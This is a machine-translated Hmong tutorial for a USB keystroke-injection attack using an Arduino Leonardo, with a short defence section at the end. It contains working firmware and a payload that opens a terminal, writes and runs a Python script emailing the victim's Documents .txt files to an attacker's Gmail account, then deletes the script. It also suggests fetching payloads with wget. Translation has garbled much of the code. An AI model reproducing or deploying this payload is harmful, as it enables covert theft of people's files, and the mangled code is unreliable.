Arduino Keyboard Exploit Demo (HID) thiab Kev Tiv Thaiv: 4 Cov Kauj Ruam (nrog Duab)

2024 Tus sau: John Day | [email protected]. Kawg hloov kho: 2024-01-30 09:29

Hauv qhov haujlwm no peb yuav siv arduino leonardo los sim ua kom muaj peev xwm USB nres siv HID (humain interface device).

Kuv tau tsim qhov kev qhia no tsis pab hackers tab sis qhia koj qee qhov kev phom sij tiag tiag thiab yuav tiv thaiv koj tus kheej li cas los ntawm kev phom sij ntawd. Cov cuab yeej no nws tsis yog lub cuab yeej uas tuaj yeem siv rau ntawm txhua lub platform rau hackers, nws yog ntau qhov pov thawj ntawm lub tswv yim hauv kev nthuav dav.

Peb yuav kawm cov hauv qab no:

- yuav siv li cas arduino leonardo los ua raws cov keyboard

- yuav ua li cas nyeem cov ntaub ntawv los ntawm SD daim npav

- yuav tsim tsab ntawv nab hab sej uas txheeb xyuas cov ntaub ntawv thiab xa email rau lawv li cas

- yuav tiv thaiv koj tus kheej li cas los ntawm kev nyiag khoom USB

Kauj ruam 1: Cov ntaub ntawv

Qhov:

1. Arduino leonardo

2. micro USB daim npav nyeem ntawv

3. ob peb GB SD daim npav

4. thawb lub pob zoo li qhov no (VCC, Hauv av thiab teeb liab)

5. poj niam-txiv neej thiab poj niam-poj niam jumper cables

6. micro USB rau USB cable

Kauj Ruam 2: Txhim Kho Lub Ntaus Ntawv

Ua ntej kev qhia tsev tsim peb rov tshuaj xyuas txoj cai ua haujlwm:

Arduino leonardo tuaj yeem coj tus yam ntxwv zoo li tib neeg lub cuab yeej sib cuam tshuam (HID) thiab yog li ntawd tuaj yeem ua raws li nas thiab keyboard. Peb yuav siv qhov tshwj xeeb no los qhib lub davhlau ya nyob twg (hauv UBUNTU linux) thiab sau ib tsab ntawv me uas yuav nkag mus /Cov ntawv tais ceev tseg hauv tus neeg siv lub tsev nplaub tshev daim ntawv.txt cov ntaub ntawv muaj thiab xa lawv mus rau lwm tus. Yog tias koj xav nrhiav kom paub ntau ntxiv txheeb xyuas cov kauj ruam tom ntej.

Vim tias nws yog cov cuab yeej siv khoom siv yooj yim heev, peb yuav tsis ua ib yam dab tsi.

Cov lus qhia hauv tsev

Ua ntej peb pib pib txheeb xyuas cov ntawv txuas, kuv tau txuas nrog fritzing schematics, thiab txhua cov ntaub ntawv tsim nyog

1. Sib sau ua ke:

* ntsaws lub micro USB cable hauv arduino

* txuas tus yuam sij hloov mus rau arduino (av, vcc thiab tawm module rau D8)

* txuas daim npav nyeem ntawv mus rau arduino (siv ICSP header). Arduino leonardo tsis muaj ICSP header txuas nrog cov pins digital yog li koj yuav tsum txuas daim npav nyeem ntawv mus rau ICSP header. Koj tuaj yeem pom qee cov duab kos ntawm ICSP ntawm no: https://learn.sparkfun.com/tutorials/installing-an…. Txuas tus SS tus pin rau tus lej digital 10

2. tau txais cov lej arduino, koj tuaj yeem clone kuv qhov chaw khaws khoom ntawm github: https://github.com/danionescu0/arduino thiab mus rau cov haujlwm/keyboard_exploit lossis tau txais los ntawm hauv qab no:

#suav nrog "Keyboard.h"

#include "SPI.h" #include "SD.h" String filenameOnCard = "hack.txt"; Txoj hlua sleepCommandStartingPoint = "Pw tsaug zog::"; Txoj hlua commandStartingPoint = "Command::"; int delayBetweenCommands = 10; const int buttonPin = 8; const int chipSelect = 10; int yav dhau losButtonState = HIGH; teeb tsa tsis muaj dab tsi () {pinMode (buttonPin, INPUT); Serial.begin (9600); Keyboard.begin (); yog (! SD.begin (chipSelect)) {Serial.println ("Daim npav ua tsis tiav, lossis tsis nyob tam sim no!"); rov qab; }} void loop () {int buttonState = digitalRead (buttonPin); yog ((buttonState! = PreviousButtonState) && (buttonState == HIGH)) {sdFileToKeyboard (); Serial.println ("Upload!"); ncua (500); } yav dhau los ButtonState = buttonState; } void sdFileToKeyboard () {Cov ntaub ntawv dataFile = SD.open (filenameOnCard); yog (! dataFile) {Serial.println ("Cov ntawv teev npe tshwj xeeb tsis nyob ntawm SD daim npav, txheeb xyuas filenameOnCard!"); } Txoj hlua; thaum (dataFile.available ()) {kab = dataFile.readStringUntil ('\ n'); Serial.println (kab); sendToKeyboard (kab); } cov ntaub ntawv.close (); } void sendToKeyboard (Txoj hlua) {Txoj hlua ua haujlwmLine = kab; yog (workingLine.indexOf (sleepCommandStartingPoint)! = -1) {sleepFor (kab); rov qab; } yog (ua hauj lwmLine.indexOf (commandStartingPoint) == -1) {Serial.print ("Text:"); Serial.println (kab); Keyboard.println (kab); niasEnter (); rov qab; } Serial.println ("Hais kom ua:"); int charPosition = commandStartingPoint.length (); int lineLength = line.length (); ua hauj lwmLine += ","; thaum (workingLine! = "") {workingLine = workingLine.substring (charPosition); Serial.print ("Ua Haujlwm Kab:"); Serial.println (ua haujlwm kab); int tshwj xeebCommandDelimiterPosition = workingLine.indexOf (","); Txoj hlua hais kom ua = lineLine.substring (0, specialCommandDelimiterPosition); charPosition = tshwj xeebCommandDelimiterPosition + 1; yog (hais kom ua = = "") {Serial.print ("Hais kom pom:"); Serial.println (hais kom ua); Keyboard.press (getCommandCode (hais kom ua)); ncua (delayBetweenCommands); }} Keyboard.releaseAll (); ncua (delayBetweenCommands); } void pressEnter () {Keyboard.press (KEY_RE END_TURN); Keyboard.releaseAll (); } void sleepFor (String line) {int sleepAmount = line.substring (sleepCommandStartingPoint.length (), line.length ()). toInt (); Serial.print ("Tsaug zog rau:"); Serial.println (sleepAmount); ncua (sleepAmount); } char getCommandCode (Cov ntawv hlua) {char textCharacters [2]; text.toCharArray (textCharacters, 2); char code = textCharacters [0]; code = (ntawv == "KEY_LEFT_CTRL")? KEY_LEFT_CTRL: chaws; chaws = (ntawv == "KEY_LEFT_SHIFT")? KEY_LEFT_SHIFT: chaws; chaws = (ntawv == "KEY_LEFT_ALT")? KEY_LEFT_ALT: chaws; chaws = (ntawv == "KEY_UP_ARROW")? KEY_UP_ARROW: chaws; code = (ntawv == "KEY_DOWN_ARROW")? KEY_DOWN_ARROW: chaws; code = (ntawv == "KEY_LEFT_ARROW")? KEY_LEFT_ARROW: chaws; chaws = (ntawv == "KEY_RIGHT_ARROW")? KEY_RIGHT_ARROW: chaws; chaws = (ntawv == "KEY_RIGHT_GUI")? KEY_RIGHT_GUI: chaws; chaws = (ntawv == "KEY_BACKSPACE")? KEY_BACKSPACE: chaws; code = (text == "KEY_TAB")? KEY_TAB: code; chaws = (ntawv == "KEY_RE END_TURN")? KEY_RE END_TURN: chaws; code = (ntawv == "KEY_ESC")? KEY_ESC: chaws; code = (ntawv == "KEY_INSERT")? KEY_INSERT: chaws; chaws = (ntawv == "KEY_DELETE")? KEY_DELETE: chaws; chaws = (ntawv == "KEY_PAGE_UP")? KEY_PAGE_UP: chaws; code = (ntawv == "KEY_PAGE_DOWN")? KEY_PAGE_DOWN: chaws; chaws = (ntawv == "KEY_HOME")? KEY_HOME: chaws; chaws = (ntawv == "KEY_END")? KEY_END: chaws; code = (text == "KEY_CAPS_LOCK")? KEY_CAPS_LOCK: chaws; code = (ntawv == "KEY_F1")? KEY_F1: chaws; code = (ntawv == "KEY_F2")? KEY_F2: chaws; code = (ntawv == "KEY_F3")? KEY_F3: chaws; code = (ntawv == "KEY_F4")? KEY_F4: chaws; code = (ntawv == "KEY_F5")? KEY_F5: chaws; code = (ntawv == "KEY_F6")? KEY_F6: chaws; code = (ntawv == "KEY_F7")? KEY_F7: chaws; code = (ntawv == "KEY_F8")? KEY_F8: chaws; code = (ntawv == "KEY_F9")? KEY_F9: chaws; code = (ntawv == "KEY_F10")? KEY_F10: chaws; code = (ntawv == "KEY_F11")? KEY_F1: chaws; code = (ntawv == "KEY_F12")? KEY_F2: chaws;

rov qab chaws;

}

3. Tshaj tawm cov cai rau arduino, nco ntsoov xaiv 9600 baud tus nqi, chaw nres nkoj txuas thiab arduino leonardo

4. Hloov daim npav SD siv FAT16 lossis FAT32

5. Yog tias koj cloned lub github repo los saum toj no, theej cov hack.txt ntawv ntawm daim npav, yog tias tsis yog cov ntawv teev tseg hauv qab no:

Hais kom:: KEY_LEFT_CTRL, KEY_LEFT_ALT, tSleep:: 500 vi hack.py Pw:: 300 Command:: KEY_INSERT import smtplib ntshuam glob, os los ntawm os.path import expanduser los ntawm email. MIMEMultipart import MIMEMultipart los ntawm email. MIMEBase import MIMEBase los ntawm email. MIMEText ntshuam MIMEText los ntawm email. Utils ntshuam COMMASPACE, formatdate los ntawm email ntshuam Encoders

smtp_user = 'sender_gmail_address'

smtp_pass = 'sender_gmail_password' to_address = 'receiver_address' scan_documents_location = 'Cov ntaub ntawv'

kawm = lub cev = 'Cov ntaub ntawv los ntawm hacked lub computer'

header = 'To: {0} nFrom: {1} nSubject: {2} n'.format (to_address, smtp_user, subject)

def sendMail (rau, kawm, ntawv, cov ntaub ntawv = ):

msg = MIMEMultipart () msg ['From'] = smtp_user msg ['To'] = COMMASPACE.join (to) msg ['Date'] = formatdate (localtime = True) msg ['Subject'] = subject msg.attach (MIMEText (ntawv nyeem)) rau cov ntawv hauv cov ntawv: ib feem = MIMEBase ('daim ntawv thov', "octet-stream") part.set_payload (qhib (ntawv, "rb"). Nyeem ()) Encoders.encode_base64 (ib feem) ib feem. add_header ('Cov ntsiab lus-Disposition', 'attachment; filename = " % s"' % os.path.basename (file)) msg.attach (ib feem)

neeg rau zaub mov = smtplib. SMTP ('smtp.gmail.com:587')

server.starttls () server.login (smtp_user, smtp_pass) server.sendmail (smtp_user, rau, msg.as_string ()) server.quit ()

sendMail ([to_address], subject, body, glob.glob ("{0}/{1}/*. txt".format (expanduser ("~"), scan_documents_location)))

Pw tsaug zog:: 50 Hais kom:: KEY_ESC Pw tsaug zog:: 100: x Pw tsaug zog:: 500 nohup nab hab sej hack.py & Pw tsaug zog:: 700 rm -rf hack.py Pw tsaug zog:: 400 Hais kom:: KEY_LEFT_ALT, KEY_F4

6. Kho cov kab hauv qab no:

smtp_user = 'sender_email_addr'

smtp_pass = 'sender_password' to_address = 'receiver_address'

Thiab hloov nrog koj tus email chaw nyob

7. Tshem daim npav thiab ntxig rau hauv daim npav nyeem ntawv arduino

Kauj Ruam 3: Nws Ua Haujlwm Li Cas Cov Lus Qhia

Kev tawm tsam yuav ua haujlwm li cas:

1. Thaum lub pob nyem, tus leonardo yuav nyeem daim npav SD siv tus nyeem daim npav SD. Cov ntaub ntawv tshwj xeeb uas muaj cov yuam sij thiab cov yuam sij ua ke yuav nyob ntawm daim npav. Cov ntaub ntawv npe yog "hack.txt".

Cov ntaub ntawv tuaj yeem muaj cov ntawv nyoos, thiab nws yuav dhau mus rau cov keyboard ib yam li nws yog.

Tsis tas li nws tuaj yeem muaj cov lus txib tshwj xeeb xws li "Sleep::" thiab "Command::".

Ib txoj kab zoo li:

Pw tsaug zog:: 200 txhais tau tias tsaug zog 200 ms

Ib txoj kab zoo li:

Hais kom:: KEY_LEFT_CTRL, KEY_LEFT_ALT, t txhais tau tias sab laug ctrl nias, sab laug alt nias, t nias thiab txhua yam tso tawm

Koj tuaj yeem tshawb xyuas txhua tus yuam sij tshwj xeeb ntawm no:

2. Leonardo yuav nyeem kab ntawv ib kab, thiab txhais cov lus txib thiab ua raws cov lej ntawm cov keyboard. Cov ntaub ntawv "hack.txt" muaj ua ke ntawm cov yuam sij uas ua cov hauv qab no (rau UBUNTU linux):

a qhib lub davhlau ya nyob twg (CTRL + ALT + T)

b. qhib cov ntaub ntawv nab hab sej rau kev tsim siv vi (sau "vi hack.py"

c. sau ib tsab ntawv nab nab sab hauv uas sau tag nrho cov ntawv sau hauv cov ntawv hauv tsev thiab xa lawv mus rau qhov chaw nyob tshwj xeeb gmail

d. sau cov ntaub ntawv hauv keeb kwm yav dhau ("nohup nab hab sej hack.py &")

e. rho tawm cov ntawv (rm -rf hack.py)

f. Kaw lub davhlau ya nyob twg (ALT + F4)

Tag nrho txhua yam no khiav hauv ob peb feeb thiab tsis tso tseg ib qho cim tseg.

Txhim kho thiab daws teeb meem

* Koj yuav pom tias tom qab kuv qhib lub davhlau ya nyob twg kuv tab tom sau cov ntaub ntawv nab. txoj hauv kev zoo dua rau nws yuav yog los tuav nws qhov chaw thiab rub tawm nws siv "wget some_url" hais kom ua, tom qab ntawd hloov nws mus rau hack.py

* Tsis tas li peb tuaj yeem rub tawm lossis khiav qhov kev npaj ua tau zoo rau lub hom phiaj ua haujlwm

* wifi tuaj yeem txuas ntxiv rau tus qauv, thiab cov hacks tuaj yeem rub tawm ntawm WIFI

* koj tuaj yeem siv arduino micro (uas yog me dua) thiab kos cov cai siv rau ntawm nws (kom nws me dua)

Txwv

1. Vim tias cov cuab yeej simulated (keyboard thiab nas) tsis muaj kev tawm tswv yim peb tsis paub tias yuav muaj dab tsi tshwm sim tom qab tshaj tawm cov lus txib uas txhais tau tias peb yuav tsum siv qeeb. Piv txwv li kuv tab tom tshaj tawm kom qhib lub davhlau ya nyob twg, tab sis kuv tsis paub tias thaum twg nws yuav qhib tiag, yog li kuv yuav tsum qhia kom meej qhov kev ncua sijhawm kom ntseeg tau tias cov ntawv ntaus tom qab yuav tsis ploj.

2. Peb yuav ntsib teeb meem kev tso cai zoo li tsis muaj kev nkag mus rau USB chaw nres nkoj lossis kev tso cai rau nruab ib yam dab tsi

3. Kev ntaus ntawv nrawm nws tsis zoo ntawm leonardo

4. Yuav ua haujlwm ntawm lub hom phiaj ua haujlwm nkaus xwb (hauv peb qhov xwm txheej UBUNTU linux)

Hauv kauj ruam tom ntej yuav sim nrhiav txoj hauv kev los siv cov kev txwv no txhawm rau tiv thaiv peb lub khoos phis tawj los ntawm kev raug nyiag

Kauj Ruam 4: Kev tawm tsam

1. Disabling USB chaw nres nkoj

-rau windows koj tuaj yeem tshawb xyuas qhov kev qhia no:

2. Whitelist USB cov cuab yeej:

- rau lub qhov rais:

2. Xauv koj lub computer thaum koj tsis nyob deb

3. Tsis txhob nkag mus rau hauv paus (xav tau tus lej cim rau txhim kho ib yam dab tsi)

4. Khaws koj tus kheej txog hnub tim (hloov tshiab tsis siv neeg ntawm)